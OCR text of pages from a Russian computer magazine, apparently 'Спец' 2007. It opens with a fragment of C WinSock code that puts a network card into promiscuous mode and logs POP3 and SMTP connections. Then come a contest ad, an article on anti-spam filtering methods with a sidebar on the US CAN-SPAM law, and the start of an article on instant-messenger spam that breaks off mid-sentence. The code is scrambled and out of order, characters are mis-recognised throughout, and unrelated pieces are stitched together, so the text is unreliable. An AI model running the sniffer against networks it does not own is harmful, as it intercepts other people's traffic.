// Слущающий сокет 

// Инициализация WS2_32 

// Создание RAW-coxeta 
IPPROTO_IP ); 


// Определение информации по имени хоста 
pLocalHostEnt; 


// Подготовка структуры SockAddr с адресом нашего хоста 
SOCKADDR_IN SockAddr; 
ZeroMemory (&SockAddr, sizeof (SockAddr) ) ; 
SockAddr.sin_family = AF_INET; 
SockAddr.sin_addr.s_addr = ((in_addr *)pLocalHostEnt->h_addr_list[0])->s_addr; 


/* 

// псли на ПК несколько сетевых карт, то вместо определения ТР его нужно задать 
вручную 

SockAddr.sin_addr.s_addr = inet_addr("x.x.x.x"); 

ay 


printf("Host ТР = $s \n", inet_ntoa(SockAddr.sin_addr)); // Привязка 
(SOCKADDR *)&SockAddr, sizeof (SOCKADDR) ) ; 
// Переключение сетевой карты в "promiscuous mode" для захвата всех пакетов 
unsigned long flag = 1; 
res = ioctlsocket (RawSocket, SIO_RCVALL, &flag) ; 
// Прием ТР-пакетов в «мертвом» цикле 


res = bind(RawSocket, 


while( true ) 
{ 
// Ожидание очередного пакета 
int count; 
sizeof (Buffer) ); 
(char *)Buffer, 
// Анализ только пакетов TCP v4 


ZeroMemory (&Buffer, 


count = recv( RawSocket, sizeof (Buffer), 0 ); 


if (count > 33 && Buffer[0] == 0x45 && Buffer[9] == 0x06) { 
// Порт = 110 ? пто РОРЗ 
if ((Buffer[20] == 0 && Buffer[21] == 110) || 
(Buffer[22] == 0 && Buffer[23] == 110) 


// Отлов пакетов, у которых выставлены флаги SYN + ACK 
if (Buffer[33] & 0x12 == 0x12) 


printf ("POP3: %d.%d.%d.%d -> %d.%d.%d.%d \n", 
Buffer[12], Buffer[13], Buffer[14], Buffer[15], 
Buffer[16], Buffer[17], Buffer[18], Buffer[19]); 
// Порт = 25 ? to SMTP 
if ((Buffer[20] == 0 && Buffer[21] == 25) || 
(Buffer[22] == 0 && Buffer[23] == 25) 


// Отлов пакетов, у которых выставлены флаги SYN + ACK 
if (Buffer[33] & 0x12 == 0x12) 
printf("SMTP: %d.%d.%d.%d -> %d.%d.%d.%d \n", 
Buffer[12], Buffer[13], Buffer[14], Buffer[15], 
Buffer[16], Buffer[17], Buffer[18], Buffer[19]); 


} 
closesocket (RawSocket) ; 
WSACleanup (); 

} 
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КОНКУРС ДЛЯ ЧИТАТЕЛЕЙ СПЕЦА! 

МЫ ПРОВОДИМ КОНКУРС НА ЛУЧШУЮ СТАТЬЮ OT НАШИХ ЧИТАТЕЛЕЙ! ТЫ ОТЛИЧНО РАЗБИ- 
РАЕШЬСЯ В СОВРЕМЕННЫХ ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЯХ? ДЛЯ ТЕБЯ НЕТ СЕКРЕТОВ 
В ПРОГРАММИРОВАНИИ? МОЖЕШЬ СДЕЛАТЬ КРУТЕЙШИЙ ВЕБ-САЙТ ДАЖЕ В БЛОКНОТЕ, 
НАДЕЖНО ЗАЩИТИШЬ ОТ ВТОРЖЕНИЯ СЕТЬ ЛЮБОГО РАЗМЕРА? ЗНАЕШЬ ЧТО-ТО ТАКОЕ, 
ЧТО БУДЕТ ИНТЕРЕСНО ДРУГИМ, И ИЩЕШЬ СПОСОБ ПОДЕЛИТЬСЯ ИНФОРМАЦИЕЙ? ТОГДА 
ТЫ ПРИШЕЛ ПО АДРЕСУ! НАПИШИ СТАТЬЮ НАТУ ТЕМУ, КОТОРАЯ ТЕБЕ НАИБОЛЕЕ БЛИЗКА, 
В КОТОРОЙ ТЫ РАЗБИРАЕШЬСЯ ЛУЧШЕ ВСЕХ И ПРИШЛИЕЕ НАМ. 


Следи за публикуемыми списками победителей. 
Лучшие авторы получат ценные цифровые призы 
от журнала «СПЕЦ» и наших партнеров! 


УСЛОВИЯ УЧАСТИЯ В конкурсе будут участвовать статьи, присланные до 1 июля 2007 года. Статьи должны 

В КОНКУРСЕ: соответствовать тематике журнала. Объем статьи должен быть не менее 9 тысяч знаков 
(с пробелами). Статья должна включать в себя иллюстрации (картинки, фотографии, 
скриншоты). 


Критериями оценки будут выступать: техническая грамотность, интересность и необычность, 
полезность, литературная грамотность, стиль написания и легкость чтения материала 


ПРИЗЫ: Третье место: цифровай фотокамера Samsung NV-7 с 7-мегапиксельным разрешением 
и 7-кратным зум-объективом Schneider-Kreuznach. Все это собрано воедино в легком 
и стильном корпусе из черного алюминиего сплава, который надежно защитит аппарат 
от случайных столкновений с твердыми предметами. 


Мы хотим, чтобы ты действительно постарался, выложился на все сто. Поэтому, чтобы 
подстегнуть твое рвение и заинтриговать тебя, информацию о призах за 1-ое и 2-ое места 
мы будем держать в секрете. 
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КАЖДЫЙ ДЕНЬ МНЕ ПРИХОДЯТ ДЕСЯТКИ 
НЕЖДАННЫХ ПИСЕМ. ЭТО ОЧЕНЬ 
НАПРЯГАЕТ, ОСОБЕННО КОГДА ПЫТАЕШЬСЯ 
НАЙТИ ТО ЕДИНСТВЕННОЕ ЭЛЕКТРОННОЕ 
СООБЩЕНИЕ, КОТОРОЕ ТАК ТЕБЕ НУЖНО. 
ЕЩЕ ОСТРЕЕ ЭТО ПРОБЛЕМА СТОИТ 

В КОРПОРАТИВНОЙ ПЕРЕПИСКЕ — 

ТАМ ЛЮДИ НЕ ПРОСТО НЕРВНИЧАЮТ, 

А ТЕРЯЮТ ВПОЛНЕ РЕАЛЬНЫЕ ДЕНЬГИ. 
СООТВЕТСТВЕННО, ВСЯКОМУ ДЕЙСТВИЮ 
НЕОБХОДИМО НАЙТИ ПРОТИВОДЕЙСТВИЕ, 
И ПОТОМУ СТАЛИ РАЗРАБАТЫВАТЬСЯ 
РАЗНООБРАЗНЫЕ ТЕХНОЛОГИИ БОРЬБЫ 
СО СПАМОМ, О КОТОРЫХ Я СЕЙЧАС 

И РАССКАЖУ 


Чееоп!$ (deeonis @ gmail.com), icq: 982-622 


Спамерский бизнес — очень прибыльное дело. 
На рассылке писем можно заработать столько, 
сколько простой смертный не потратит за всю 
жизнь. Поэтому спамеры постоянно изобретают но- 
вые методы доставки своих писем пользователям 
Сети. Бороться со столь неприятной вещью нужно 
комплексно. Противодействие должно быть много- 
уровневым: образовательным, организационным, 
законодательным и технологическим. Я подробно 
расскажу лишь о последнем. 

> технологические инструменты борьбы 
со спамом. В настоящее время состояние индуст- 
рии производства программного обеспечения по 
борьбе со спамом можно определить как незре- 
лое. Постоянно выходит новое ПО, призванное 
фильтровать нежелательную рекламу, приходя- 
щую на е-тай. В каждом продукте используются 
свои методы определения «нежелательных сооб- 
щений», но в целом их можно разделить на две 
большие группы: процедурные и распределенные 
методы борьбы со спамом. 


> — процедурные методы. Все процедурные мето- 
ды борьбы со спамом основываются на проверке 
подлинности (аутентификации) отправителя. Су- 
ществует ряд методов, определяющих, реален ли 
отправитель письма или это просто бот. Такая тех- 
нология называется системой с запросом к отпра- 
вителю (challenge response systems) и использует- 
ся для повышения издержек при рассылке спама. 
Все запросы подразделяются на три общие катего- 
рии: запросы для человеческого интеллекта, вы- 
числительные запросы и денежные запросы. При 
этом адресат сможет получить письмо только пос- 
ле того, как отправитель ответит на запрос. 
Запросы для человеческого интеллек- 
та (human challenges) могут представлять собой 
картинку с плохо читаемой надписью (по типу тех, 
что предлагается ввести при регистрации на фо- 


румах). Отправитель должен ввести буквы, изоб- 
раженные в виде графического образа. Подоб- 
ную задачу может решить практически любой че- 
ловек, а если запрос составлен достаточно хоро- 
шо, то компьютеру это будет не под силу. 

В случае с вычислительными запроса- 
ми (computational challenges) компьютерная систе- 
ма должна решить некоторую головоломку. Если 
провести аналогию, получатель предлагает отпра- 
вителю пазл, кусочки которого находятся в случай- 
ном порядке. Отправитель должен составить эти 
кусочки и выслать ответ получателю. Причем сами 
головоломки должны легко и быстро составляться, 
и также легко проверятся, а вот решение должно 
быть достаточно долгим. При наличии стандартов 
на вычислительные запросы весь процесс можно 
автоматизировать. То есть система на стороне ад- 


pecata при получении письма формирует вычисли- 
тельный запрос и отсылает его отправителю. 
На стороне отправителя, в свою очередь, произво- 
дятся соответствующие вычисления, которые зани- 
мают достаточное время (несколько минут), после 
чего ответ уходит обратно адресату, на стороне ко- 
торого осуществляется его проверка. Большой 
объем вычислений для проведения массовых рас- 
сылок будет слишком дорог. 

Суть метода с микроплатежами состоит 
в следующем: при получении письма адресат про- 
сит прислать отправителя некоторую несущест- 
венную сумму денег, причем если письмо являет- 
ся спамом, деньги остаются у получателя. Данный 
метод можно автоматизировать, заведя для каж- 
дого переписчика некий счет, на котором будет 
храниться определенная сумма. При получении 
подобного запроса со счета будет сниматься нес- 
колько центов. 

У этого метода существует множество недос- 
татков, и он наиболее сложен в реализации, как 
с технической, так и с экономико-юридической CTO- 
роны. Но его можно использовать совместно с бе- 
лыми списками, в результате чего пользователь, 
единожды выполнив запрос, попадает в белый спи- 
сок, и более не проверяется на «существование». 

Еще один способ борьбы со спамом — 
это создание кратковременных (ephemeral) или 
отключаемых (disposable) адресов электронной 
почты. В этом случае пользователь дает каждому 
человеку, с которым он переписывается, свой от- 
дельный адрес. Если же на какой-либо из этих ад- 
ресов начнет поступать спам, то его можно просто 
уничтожить одним нажатием кнопки. В результате 
все письма, адресованные на него, будут возвра- 
щаться с отказом. Примерно по такому механизму 
действует большинство пользователей. Регистри- 
руется е-тай на каком-либо из бесплатных серве- 
ров и указывается во всех сервисах Сети, которые 
требуют адрес почтового ящика. 

Также существует идея снабдить каждое пись- 
мо электронной подписью. Кажется, что все просто 
и достаточно эффективно, но подобное решение 
потребует в корне пересмотреть подход к электрон- 
ной почте и к протоколам, реализующим данный 
сервис. Потребуется создавать новые глобальные 
стандарты и пересаживать на них весь интернет. 
> распределенные методы. Технически спам 
можно фильтровать двумя основными способами: 
по формальным признакам сообщения (по обратно- 


му адресу, способу отправки и оформлению) 
и по его содержанию (то есть по его смыслу, семан- 
тически). Оба способа имеют свои особенности ре- 
ализации, а также свои достоинства и недостатки. 
> формальные методы. Самыми распростра- 
ненными методами формальной фильтрации яв- 
ляются черные и белые списки. Спамеры должны 
посылать свои письма откуда-то. Оказывается, что 
строку «Откуда» (From), как и большинство других 
элементов электронного письма, крайне легко 
фальсифицировать. Однако 1Р-адрес, с которого 
приходит сообщение, то есть его интернет-адрес, 
подделать почти невозможно. Черные списки 
включают перечни адресов отправителей спама; 
они составляются примерно таким же образом, 
как работают системы с поиском совпадений, — 
либо на основе жалоб пользователей, либо с по- 
мощью «ловушек». 

Но у блэклистов есть много своих недостат- 
ков. Часто в черные списки попадают открытые 
прокси-серверы и открытые почтовые пересылки. 
Также возможны ситуации попадания в эти спис- 
ки абсолютно невинных пользователей. Так, неко- 
торые !Р-адреса являются источниками как спама, 
так и нормальных писем — например, динамичес- 
кие IP-agpeca, выделяемые провайдером абонен- 
там коммутируемого доступа, однако черные 
списки этого не различают. Бывали случаи, что за 
спам наказывали целые подсети. Также сущест- 
вует проблема с обновлением блэклистов. Тем, 
кто уже попал в черные списки (а это могут быть 
невинные жертвы спамеров, использующих дыры 
в системе безопасности), порой непросто добить- 
ся удаления оттуда. 

Белые списки или Safe Lists — одна из самых 
распространенных технологий, которая работает 
в сочетании с обучаемыми фильтрами, системами 
с поиском совпадений и системами с запросом 
к отправителю. В белые списки включают тех лю- 
дей, которые зарекомендовали себя как добропо- 
рядочные отправители. Как правило, это индивиду- 
альные пользователи, хотя в некоторых системах 
могут быть указаны целые домены. Если обучае- 
мая система помечает сообщение как спам, но от- 
правитель записан у пользователя в белом списке, 
то сообщение все же доходит до адресата. Таким 
образом, этот метод блокирования спама помога- 
ет уменьшить вред от ложных срабатываний. 

Некоторые пользователи предпочитают край- 
ний вариант использования белых списков — 
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это так называемый «эксклюзивный режим». 
В этом случае пропускаются только письма, чьи 
отправители находятся в белом списке, а осталь- 
ные складываются в папку «Спам». Адресат может 
сам просматривать время от времени папку с спа- 
мом и выбирать оттуда письма, которые таковым 
не являются. Этот метод подходит людям, получа- 
ющим малое количество электронных сообщений 
или тем, чей круг общения по переписке достаточ- 
но хорошо определен. Для бизнес-пользователей 
этот способ не подходит, так как большинство пи- 
сем приходит от новых клиентов. 

В целом, белые списки не очень надежны. 
Подделать адрес отправителя очень просто, 
так как используемый протокол позволяет любому 
человеку выдать себя за другого. Поэтому мы час- 
то можем получать спам от самих себя, так как 
многие пользователи вносят в белый список себя 
или своих друзей. 

Еще одним из методов фильтрации спама яв- 
ляются формальные правила. Формальные прави- 
ла проверяют способ посылки письма и его оформ- 
ление. К типичным признакам спамерского письма 
относятся отсутствие адреса отправителя, отсут- 
ствие или наличие слишком большого числа полу- 
чателей, отсутствие 1Р-адреса в системе DNS, 
сфальсифицированные или некорректные служеб- 
ные заголовки и т.п. Часто производится фильтра- 
ция по размеру и формату сообщения. Набор пра- 
вил антиспамерской программы может содержать 
сотни и даже тысячи элементов. 
> лингвистические методы. Для каждого cna- 
мерского письма может быть автоматически соз- 
дана так называемая сигнатура, позволяющая 
распознать это письмо даже с небольшими моди- 


Эффективность DCC и STA 
Выходные дни Спам всего DCC ЕЯ STA Be Возможный STA Be FN Обнаруженный спам 
09 мая 2003 574 380 2 170 0 23 |. 4 99.3% 
16 мая 2003 557 308 1 210 0 38 5 6 98.9% 
23 мая 2003 608 327 0 233 1 48 1 0 99.6% 
30 мая 2003 724 423 0 243 1 53 4 5 98.6% 
30 марта 2005 2463 1438 3 856 2 162 11 15 99.1% 


28 АНТИСПАМ СПЕЦ 01-07 


-.—- + 


„+ 


(e+ tweiap te te tet tee Рени ка рые fe 


Fmt romeo rated as pa oe ль Oe 


Гм fee noe tome 


Антиспам в BATe 


фикациями. Сигнатуры — это своего рода слепки 
письма, белее короткие, чем само письмо, но 
идентифицирующие его достаточно точно. Ис- 
пользуются самые разнообразные сигнатуры: спи- 
сок наиболее часто встречающихся слов письма, 
вектор служебных слов, контрольные суммы байт 
каждых пяти слов, свертки скользящих по тексту 
окон (шинглы) и так далее. 

Одним из таких методов, основанных на сиг- 
натурах, является Distributed Checksum Clearing 
House (DCC). Суть метода заключается в том, что 
для каждого входящего письма определяется конт- 
рольная сумма, после чего она отсылается на спе- 
циальный ОСС-сервер, где сверяется с базой дан- 
ных. Если такая контрольная сумма уже неоднок- 
ратно приходила на сервер, то письмо идентифи- 
цируется как спам. Но контрольные суммы разра- 
батывались для выявления ошибок при передаче 
данных. Отличие информации хотя бы на один бит 


приводит к формированию совершенно разных 
СВС. Таким образом, спамерам достаточно вста- 
вить пару случайных байт в письмо, и DCC-cepBep 
ничего не заподозрит. 

Специально для идентификации спама были 
разработаны так называемые «нечеткие конт- 
рольные суммы». Они составлены таким образом, 
что определенные части текстового сообщения не 
учитываются. Благодаря этому сервер DCC может 
присваивать сообщениям, содержащим одинако- 
вые высказывания, идентичные регистрационные 
суммы. Используемые алгоритмы игнорируют ин- 
тервалы (пробелы), удаляют имена пользовате- 
лей из URL и пропускают случайные текстовые 
компоненты. 

Некоторые серверы DCC работают и с при- 
манками для спама. Эти системы предназначены 
для того, чтобы привлекать и собирать спам. Они 
могут быть сконфигурированы таким образом, что- 
бы обозначать как спам каждое поступающее 
к ним сообщение. Это надежный и эффективный 
метод, с помощью которого другие пользователи 
DCC могут гарантированно идентифицировать со- 
общение как спам. 

Еще одним лингвистическим методом явля- 
ется Statistical Token Analysis. В случае STA речь 
идет о статическом методе анализа. Особен- 
ностью STA является то, что он учитывает как 
спам, так и хэм (не очень известное выражение из 
компьютерного жаргона для обозначения леги- 
тимных сообщений). Система идентифицирует 
спам и легитимные сообщения с помощью анали- 
за слов и знаков соответствующего сообщения 


(значений частот и статистических сравнений). 
В базе сохраняются частотные характеристики 
для слов и знаков препинания, которые встреча- 
ются как в спаме, так и в хэме. С помощью этих 
сведений можно с высокой степенью точности оп- 
ределить легитимность письма. 

Одной из разновидностей $ТА является ме- 
тод на основе анализа Байеса. Этот анализ предс- 
тавляет собой методику комбинирования вероят- 
ности и основан на правиле, которое математик То- 
мас Байес открыл в XVIII Bexe. Для каждого слова 
или знака препинания вычисляется вероятность 
попадания письма в спам или хэм. Затем, при по- 
лучении нового сообщения его текст анализирует- 
ся на основе этих вероятностей, то есть вычисляет- 
ся коэффициент принадлежности письма к спаму 
по формуле Байеса. 

Анализ Байеса, в противоположность обыч- 
ным методам фильтрации по содержанию, имеет 
три решающих преимущества. Во-первых, анализ 
проводится для двух различных видов знаков: те, 
что свидетельствуют о спаме, и те, которые указы- 
вают на легитимные сообщения. Методически это 
намного точнее и надежнее, чем чистая фильтра- 
ционная техника. Во-вторых, правило Байеса рабо- 
тает совершенно независимо от используемого 
языка оригинала, и, в-третьих, пользователям не 
нужно постоянно контролировать и корректировать 
списки фильтрации. 

Успешность метода зависит от наличия бе- 
зошибочно проанализированных примеров иден- 
тифицированного спама или хэма. Затем на их ос- 
новании могут быть созданы надежные базы дан- 


ЗАКОН ПРОТИВ 
СПАМА В США 


В декабре 2003 года президент США Джордж Буш подписал 
закон против спама, который налагает ограничения на рас- 
сылку непрошеной электронной почты. Палата представите- 
лей США подавляющим большинством голосов утвердила 
этот закон, что явилось итогом продолжающихся уже шесть 
лет попыток создать федеральное законодательство, сдер- 
живающее рассылку непрошеных коммерческих сообщений. 
Эта мера, грозящая штрафами и тюремным заключе- 
нием, призвана обуздать массовую рассылку рекламы. 
За нее проголосовали 392 конгрессмена против 5. «Амери- 
канцы получают право заявить: «Вычеркните меня из ваше- 
го списка, мне это не нужно», — говорит член республиканс- 
кой партии Хизер Уилсон. По словам другого законодателя, 
республиканца Фреда Аптона, законопроект «защищает на- 
ших детей от невольного созерцания всего того мусора, ко- 
торый может вывалиться из семейного почтового ящика». 
Закон носит официальное название «controlling the 
assault of non-solicited pornography and marketing act (сап- 
spam)». Министерство юстиции США и министерство торговли 


США назвали сап-зрат «комплексом технологических, адми- 
нистративных, гражданских и уголовных мер», который пре- 
доставит потребителям возможность сократить объем нежела- 
тельной почты. Положениями законопроекта запрещается: 


— ФАЛЬСИФИКАЦИЯ ЗАГОЛОВКОВ ЭЛЕКТ- 
РОННОЙ ПОЧТЫ ИЛИ ИСПОЛЬЗОВАНИЕ 
ПОЧТОВОГО СЕРВЕРА ИЛИ ОТКРЫТЫХ 
ПОЧТОВЫХ ПЕРЕСЫЛОК «ДЛЯ ОБМАНА 
ИЛИ ВВЕДЕНИЯ В ЗАБЛУЖДЕНИЕ ПОЛУ- 
ЧАТЕЛЕЙ» В ОТНОШЕНИИ ИСТОЧНИКА 
КОММЕРЧЕСКОГО ЭЛЕКТРОННОГО СООБ- 
ЩЕНИЯ. ЗАПРЕЩАЕТСЯ ТАКЖЕ РЕГИСТ- 
РАЦИЯ «ПЯТИ ИЛИ БОЛЕЕ» УЧЕТНЫХ ЗА- 
ПИСЕЙ ЭЛЕКТРОННОЙ ПОЧТЫ ИЛИ «ДВУХ 
ИЛИ БОЛЕЕ ИМЕН ДОМЕНА» С ЛОЖНОЙ 
ИНФОРМАЦИЕЙ, А ТАКЖЕ ИХ ИСПОЛЬЗО- 
ВАНИЕ ДЛЯ ОТПРАВКИ КОММЕРЧЕСКИХ 
ЭЛЕКТРОННЫХ СООБЩЕНИЙ. ЗА ПЕРВОЕ 
НАРУШЕНИЕ ПРЕДУСМОТРЕНО НАКАЗА- 
НИЕ ВПЛОТЬ ДО ТРЕХЛЕТНЕГО СРОКА 
ТЮРЕМНОГО ЗАКЛЮЧЕНИЯ. 


— РАССЫЛКА КОММЕРЧЕСКИХ ЭЛЕКТРОН- 
НЫХ СООБЩЕНИЙ С ВВОДЯЩИМ 


В ЗАБЛУЖДЕНИЕ ТЕКСТОМ В СТРОКЕ 
SUBJECT («ТЕМА»), «КОТОРЫЙ МОЖЕТ 
БЫТЬ НЕПРАВИЛЬНО ИСТОЛКОВАН ПО- 
ЛУЧАТЕЛЕМ». 


— РАССЫЛКА КОММЕРЧЕСКИХ ЭЛЕКТРОН- 
НЫХ СООБЩЕНИЙ БЕЗ «ДЕЙСТВИТЕЛЬ- 
НОГО ОБРАТНОГО АДРЕСА» ИЛИ ССЫЛ- 
КИ НА ВЕБ-СТРАНИЦУ, НА КОТОРОЙ 
МОЖНО ОТПИСАТЬСЯ ОТ РАССЫЛКИ. 


—` ПРИМЕНЕНИЕ АВТОМАТИЧЕСКИХ METO- 
ДОВ, НАПРИМЕР СКРИПТОВ, ДЛЯ ИС- 
ПОЛЬЗОВАНИЯ УЧЕТНЫХ ЗАПИСЕЙ В ТА- 
КИХ БЕСПЛАТНЫХ СЛУЖБАХ ЭЛЕКТРОН- 
НОЙ ПОЧТЫ, КАК HOTMAIL ИЛИ YAHOO. 


—` РАССЫЛКА КОММЕРЧЕСКИХ ЭЛЕКТРОН- 
НЫХ СООБЩЕНИЙ С «СЕКСУАЛЬНО ОРИ- 
ЕНТИРОВАННЫМ СОДЕРЖАНИЕМ», ЕСЛИ 
В НИХ НЕ СОДЕРЖИТСЯ ССЫЛКА НА РЕ- 
КОМЕНДАЦИЮ ФЕДЕРАЛЬНОЙ ТОРГО- 
ВОЙ КОМИССИИ США. ЭТО ТРЕБОВАНИЕ 
НЕ РАСПРОСТРАНЯЕТСЯ НА СПИСКИ 
ПОДПИСКИ. НАРУШИТЕЛЯМ ГРОЗИТ ТЮ- 
РЕМНОЕ ЗАКЛЮЧЕНИЕ СРОКОМ ДО ПЯ- 
ТИ ЛЕТ И ШТРАФ В РАЗМЕРЕ $150000. 


ных с соответствующими таблицами частотности. 
Но содержание деловой переписки в значитель- 
ной степени отличается от содержания личной. 
Из-за этого базы с частотами будут различны, бо- 
лее того, в зависимости от рода деятельности 
конкретного человека в письме могут фигуриро- 
вать достаточно подозрительные слова. Для таких 
случаев созданы самообучающиеся ЗТА-фильт- 
ры. Каждое пришедшее письмо оценивается 
фильтром, и если он случайно пропустил нежела- 
тельное рекламное сообщение, адресат сам дол- 
жен его пометить как спам, и фильтр добавит его 
содержание в базу. Так же пользователь должен 
поступать и с хэмом, то есть помечать его как «не 
спам». Такой подход создает очень гибкую систе- 
му, позволяющую блокировать около 98% спама. 
Но, к сожалению, он не пригоден в условиях мас- 
совой почтовой службы, в основном по причине 
большого разнообразия словарного состава кли- 
ентских ящиков. 

Для борьбы со спамом существуют так назы- 
ваемые «Обучаемые системы» (Machine Learning 
Systems). Разработанные подразделением Micro- 
soft Research, обучаемые системы предназначены 
для блокирования спама с помощью таких мето- 
дов, как нейронные сети, байесовские фильтры 
или другие средства. 

В обучаемые системы вводится значительное 
количество реальных данных, — как минимум, тыся- 
чи сообщений, но в идеале миллионы, — помеченных 
как «нормальные» или «спам». В итоге эти системы 
начинают различать типы сообщений: они запомина- 
ют, что такие слова, как «щелкните» или «бесплат- 
но», являются признаками спама, а такие, как «завт- 
ра» или «погода»,— свойствами нормального пись- 
ма. Кроме того, они используют и другие характерис- 
тики сообщения. Например, письма со ссылками и 
изображениями с гораздо большей вероятностью яв- 
ляются спамом, чем те, где нет ни того, ни другого. 

Провайдеры и почтовые серверы могут проти- 
водействовать спаму, исходящему от них самих. 
Для этого используются детекторы массовых рас- 
сылок. Этот метод может применяться там, где есть 
значительные объемы почты, то есть у провайдеров 
и на публичных почтах. Если какое-либо письмо 
направлено сразу сотням тысяч адресов, и при этом 
адрес отправителя не находится в списке основных 
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Компьютеры и интернет 


Остальной спам 
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Личные финансы 


Образование 


Другие товары и услуги 


серверов подписных рассылок (типа Subscribe.ru), ве- 
роятнее всего, что это спам. 

Для выявления спама подобным образом необ- 
ходимо выполнение двух условий: значительный объ- 
ем почты и действенный способ определения «одина- 
ковости» писем (с помощью различного рода сигнатур). 


ЧИ Gere те в г = 


Однако данный метод не может дать твердое 
заключение, является ли конкретное письмо спа- 
MOM или нет, а только констатирует факт массовос- 
ти рассылки. 
> — выводы. Итак, после всего сказанного здесь 
можно сделать вывод, что идеального способа про- 
тиводействия спаму нет, а методы незаконной рек- 
ламной рассылки постоянно модифицируются :). 
Но будем надеяться, что комплексное применение 
антиспамовых технологий позволит максимально 
эффективно бороться с нежелательными реклам- 
ными сообщениями © 


www.spamtest.ru 
ресурс, посвященный борьбе со спамом 


www. rhyolite.com/anti-spam/dec 
ОСС-метод фильтрации спама 


www.ritlabs.com/ru/solutions/bayesyan.php 
фильтрация спама no Байесу 


www.ritlabs.com/ru/solutions/Bayesit.php 
антиспамерский фильтр Bayesit 
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its me Natasha 


Вездесущий спам 


СПАМ ТАКЖЕ ОСВОИЛСЯ В ДОВОЛЬНО ПЕРСПЕКТИВНОЙ ОБЛАСТИ СЕРВИСОВ ДЛЯ 
ПЕРЕДАЧИ СООБЩЕНИЙ В РЕЖИМЕ РЕАЛЬНОГО ВРЕМЕНИ. ЭТО ЗНАКОМЫЕ ВСЕМ ICQ, 
MIRANDA, MSN MESSENGER, JABBER, AOL IMU ДРУГИЕ. ЭКСПЕРТЫ ПРОГНОЗИРУЮТ, 
ЧТО КОЛИЧЕСТВО ТАКИХ РАССЫЛОК БУДЕТ РАСТИ В ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ 


Кирилл «Висельник» Блаженнов (http: 


Основная причина того, что спамеры так ценят мес- 
сенджеры, очевидна: многие подобные системы 
предоставляют возможность публичного доступа 
к базе пользовательских данных. Это позволяет 
достаточно оперативно формировать списки для 
рассылки с минимальными затратами. А если 
учесть, что такие базы данных включают в себя де- 
мографическую, географическую и личную инфор- 
мацию (возраст, пол, имя, место проживания, инте- 
ресы), то становится ясно, почему мессенджеры AB- 
ляются ценной площадкой для рекламы. И спамеры 
часто собирают информацию о пользователях, де- 
лая рассылку персонализированной. 

Спам в интернет-мессенджерах появился чуть 
ли не одновременно с их выходом. Сегодня по мас- 
совости спам в мессенджерах все еще уступает 
классическим «почтовым рассылкам», но по тем- 
пам роста оставляет их далеко позади. Например, 
Штаты, которые являются одной из самых продви- 
нутых стран в плане интернет-технологий, сейчас 
просто захлебываются в интернет-пейджинге. 
42% взрослых пользователей Сети в США пользу- 
ются этими технологиями (про молодежь и говорить 
нечего). Несмотря на то, что специальных исследо- 
ваний на этот счет не проводилось у нас, очевидно, 
что интернет-пейджеры (а, следовательно, и спам- 
рассылки в них) очень популярны и в России. 

Наглядное свидетельство того, что спам 
в мессенджерах набирает обороты — появление 
отдельного термина «spim» (Spam by Instant Mes- 
saging). Правда, за этим термином не скрывается 
ничего особо нового. Различия обусловлены толь- 
ко разными инфраструктурами для потоков спама, 
то есть теми средствами, через которые весь этот 
бред и мусор попадает на глаза пользователю. 
Концепция и конечная цель спама независимы от 
способа доставки. 
> = что рассылают. В большинстве случаев рас- 
сылают, конечно же, рекламу. Она является самой 
распространенной, но не единственной формой 
спама, хотя у многих это уже синонимы. Даже ком- 
пании, которые занимаются легальным бизнесом, 
рекламируют свои товары и услуги при помощи 
спамеров. Соотношение «охват клиентов/стои- 
мость рассылки» — очень заманчивое, и клиенты 


клюют на него. Исходя из нашей законодательной 
базы, достаточно сложно определить, какая рас- 
сылка является законной, а какая нет. Тем более 
если спамер находится в другой стране, и прихо- 
дится синхронизировать законы двух стран. Но и 
здесь уже есть прецеденты. Например, первый 
случай возбуждения уголовного дела против спа- 
меров был зафиксирован в 2004 году, когда ком- 
пания AOL подала исковые заявления против нес- 
кольких физических лиц, обвиняемых в массовой 
рассылке рекламы через программы мгновенного 
обмена сообщениями. 

Конечно, рекламная рассылка при грамотном 
применении является очень хорошим инструмен- 
том маркетинга. Но поскольку криворукость и кри- 
вомозгость — болячка широко распространенная, 
то чаще всего такая рассылка превращается имен- 
но в серый спам. Что, во-первых, наносит 
огромный вред репутации рекламируемой компа- 
нии, а во-вторых, репутации тех, кто занимается 
легальными рекламными рассылками. 

Другое распространенное явление пришло 
в аську из реального мира — «письма счастья». 
В основном такие послания содержат в себе прось- 
бу разослать само себя по всем контактам. 
Но иногда такое сообщение содержит мысль, что 
получатель письма может получить каким-то обра- 
зом большую сумму денег, а отправитель может 
ему в этом помочь за небольшой стартовый капи- 
тал. В аське, например, часто проскакивает сооб- 
щение о «волшебных кошельках WebMoney, кото- 
рые утраивают сумму». Разумеется, ожидаемой 
прибыли адресат не получает. 

Даже просьба разослать себя другим — тоже 
далеко не безобидная вещь. Иногда таким образом 
узнается довольно много интересного о пользовате- 
лях. Если, например, на каком-нибудь транзитном 
сервере ставится сниффер, фильтрующий !СО-тра- 
фик и проверяющий пакеты по ключевым словам из 
рассылки. Поскольку число участников рассылки 
растет в геометрической прогрессии, то сбор стано- 
вится эффективнее, а результаты сбора могут быть 
самые разнообразные: от статистики и топологии 
рассылки до данных из заголовков и тела писем. 

Какой бы ни была рассылка, ее конечная 
цель — реакция пользователя. Для интернет-мес- 
сенджеров это важно, как нигде! Либо это переход 
по указанной ссылке, либо дублирование и рассыл- 
ка этого же сообщения дальше, либо комбинация 


действий. Крупная волна спима (это 2003-2004 год) 
была сгенерированна элементарно: 90% сообще- 
ний гласили что-то вроде: «Привет, зайди на мой 
сайт www.ciogja.ru». Сейчас пользователь уже по- 
умнее стал, сначала пообщается, а потом уже кли- 
кает... Но кликает в 80% случаев. 

> проблемные места. Методы, повышающие 
эффективность спима, будут совершенствоваться 
в основном в направлении создания универсально- 
го механизма, с помощью которого можно будет 
легко «закосить» под реального человека. Сейчас 


первые отголоски 


А НАЧАЛОСЬ ВСЕ В ДАЛЕКОМ 2002, 
КОГДА WINDOWS ХР ПЕШКОМ ПОД СТОЛ 
ХОДИЛ, НО УЖЕ ДОВОЛЬНО БОДРО 

И ПОЧТИ НЕ СПОТЫКАЯСЬ. ТОГДА 
КТО-ТО ИЗ УМЕЛЬЦЕВ ПРОСЕК 
ПРЕИМУЩЕСТВА СЕРВИСА 

ПОД НАЗВАНИЕМ MESSENGER. 

С НАДОЕДЛИВОЙ ПРОГРАММОЙ WIN- 
DOWS MESSENGER, КОТОРАЯ ИДЕТ 

